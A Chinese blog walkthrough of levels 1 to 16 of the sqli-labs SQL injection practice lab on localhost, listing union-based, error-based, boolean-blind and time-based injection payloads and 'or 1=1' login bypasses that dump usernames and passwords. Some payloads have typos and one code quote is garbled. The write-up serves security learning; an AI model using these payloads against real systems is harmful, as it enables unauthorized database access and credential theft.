sqli-labs前16关wp

avatar
作者
筋斗云
阅读量:0

sqli-labs第一关

在这里插入图片描述

GET传参(参数id)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=2-1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=2
在这里插入图片描述

发现id=2与id=2-1相同,可以判断出绝不是数字型,故为字符型
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’
在这里插入图片描述

在这里插入图片描述

可以判断出为 ‘ 闭合
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’–+
接下来判断列数(group/order by +二分法)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’group by 5–+
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’group by 3–+
在这里插入图片描述

判断回显位(注意此处?id=-1’)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,2,3–+
在这里插入图片描述

发现2,3为回显位
爆数据库名
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,user(),database()–+
在这里插入图片描述

爆表名
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+
在这里插入图片描述

爆users表中的列名
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’–+
在这里插入图片描述

爆username和password的数据
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’ union select 1,2,group_concat(username ,id , password) from users–+
在这里插入图片描述

sqli-labs第二关

在这里插入图片描述

相比于Less-1,Less-2中的id缺少’’
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-2/?id=1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-2/?id=2-1
在这里插入图片描述

Id=1与id=2-1结果相同,只有数字型符合此条件
数字型不用判断闭合方式,接下来列数,回显位以及各种宝库与Less-1一模一样,在此不再赘述。

sqli-labs第三关

在这里插入图片描述

代码审计发现闭合方式不同
首先判断为字符型
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-3/?id=1’
在这里插入图片描述

在这里插入图片描述

两个红色构成 ’) 闭合
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-3/?id=1’)–+

接下来与Less-1爆库一模一样
在这里插入图片描述

sqli-labs第四关

在这里插入图片描述

两处:
$id = ‘"’ . i d . ′ " ′ ; / / 用”“包裹 i d 参数 i d = ( id . '"'; //用”“包裹id参数 id=( id.";//”“包裹id参数id=(id) LIMIT 0,1"; //用()包裹id参数
Ok,那我首先判断为字符型,然后判断闭合方式
输入?id=1’ 和 ?id=1’)都没有报错
当我输入?id=1"时报错
在这里插入图片描述

在这里插入图片描述

可以判断出闭合方式为 ”)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-4/?id=1")–+
在这里插入图片描述

接下来与Less-1爆库一模一样

sqli-labs第五关

在这里插入图片描述

查看源码,感觉没啥特殊的
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=-1
在这里插入图片描述

通过这两个payload发现页面只有True和False
可以采用布尔盲注和时间盲注
首先根据页面真假值判断为字符型及闭合方式
采取布尔盲注
id=1’ and ascii(substr(‘查询语句’,1,1))>97 --+
加上二分法,可以对database()的字符进行逐个判断
或者通过pythoni脚本来判断
查询表名
?id=-1’ ascii(substr((select tabel_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100–+
查询列名
?id=-1’ ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),1,1))>100–+
查询用户名和密码

?id=-1’ ascii(substr((select username from users limit 0,1),1,1))>100–+
?id=-1’ ascii(substr((select password from users limit 0,1),1,1))>100–+

sqli-labs第六关

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=-1
在这里插入图片描述

Less-6也是,盲注
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=1"–+
在这里插入图片描述

字符型,闭合方式为 “
除了闭合方式,其他都与Less-5一模一样

sqli-labs第七关

在这里插入图片描述

逐个测试,发现只有当闭合方式为’))时,页面回显True
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=1’))–+
在这里插入图片描述

盲注
除了闭合方式,其他都与Less-5一模一样

sqli-labs第八关

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-8/?id=1’–+
在这里插入图片描述

判断为字符型和 ‘ 闭合
盲注
除了闭合方式,其他都与Less-5一模一样

sqli-labs第九关

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=-1
在这里插入图片描述

发现不管输入啥值,页面没变化
可以采用时间盲注 if+sleep()
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1’ and sleep(3)–+
判断出闭合方式为 ‘

查询表名
?id=-1’ and if(ascii(substr((select tabel_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(0),sleep(3))–+
查询列名
?id=-1’ and if(ascii(substr((seecet column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),1,1))>100,sleep(0),sleep(3))–+
查询用户名和密码
?id=-1’ and if(ascii(substr((select username from users limit 0,1),1,1))>100,sleep(0),sleep(3))–+
?id=-1’ and if(ascii(substr((select password from users limit 0,1),1,1))>100,sleep(0),sleep(3))–+

sqli-labs第十关

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10/?id=1 and sleep(3)–+
不会执行sleep(3),判断出为字符型
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10/?id=1" and sleep(3)–+
会执行sleep(3),判断闭合方式为 “
其他都和Less-9一模一样

sqli-labs第十一关在这里插入图片描述

从这一关开始为POST提交,通过代码审计发现,POST参数有两个,分别是uname和passwd

uname=1&passwd=1
在这里插入图片描述

uname=1’
&passwd=1
在这里插入图片描述

判断出闭合方式为 ‘
uname=1’ group by 3 #
&passwd=1
在这里插入图片描述

法一:
页面有报错回显,可以进行报错注入
爆出用户名和密码

法二:
使用万能密钥,绕过代码验证逻辑
uname=1’or 1=1 #
&passwd=1

在这里插入图片描述

sqli-labs第十二关

在这里插入图片描述

uname=1"
&passwd=1
在这里插入图片描述

页面报错,判断出为 “) 闭合
构造万能密钥
uname=1") or 1=1#
&passwd=1
在这里插入图片描述

刚刚测试了一下发现也可以采用报错注入进行操作

sqli-labs第十三关

在这里插入图片描述

uname=1’
&passwd=1

在这里插入图片描述

闭合方式为 ‘)

法一:
构造万能密钥
uname=1’) or 1=1 #
&passwd=1
在这里插入图片描述

uname=1’) union select 1,2 #
&passwd=1
在这里插入图片描述

法二:
这一关没有报错回显,那我可以采取sleep()进行时间盲注

sqli-labs第十四关

在这里插入图片描述

uname=1"
&passwd=1
在这里插入图片描述

判断出闭合方式为 “
uname=1" or 1=1 #
&passwd=1
在这里插入图片描述

这一关依旧没有回显,但是sleep()也不能执行,有可能被过滤了,前面几关也有可能被过滤了,难受
发现使用union select+sleep()可以执行,而and+sleep()不能执行,不知道为啥!!!
uname=1" union select 1,if(ascii(substr(database(),2,1))> 100,sleep(3),0) #
&passwd=1

sqli-labs第十五关

在这里插入图片描述

第十五关和第十一关一样,只是不产生报错信息。这就是明显的布尔盲注。因为还有错误页面和正确页面进行参考。
直接构造万能密钥
uname=1’ or 1=1 #
&passwd=1

在这里插入图片描述

简单测试了一下,布尔盲注也可以
uname=1’ union select 1,ascii(substr(database(),1,1))>97 #
&passwd=1
然后可以采用python脚本

sqli-labs第十六关

uname=1") or 1=1 #
&passwd=1
在这里插入图片描述

uname=1") union select 1,ascii(substr(database(),1,1))>97 #
&passwd=1
也以采用布尔盲注进行注入

    广告一刻

    为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!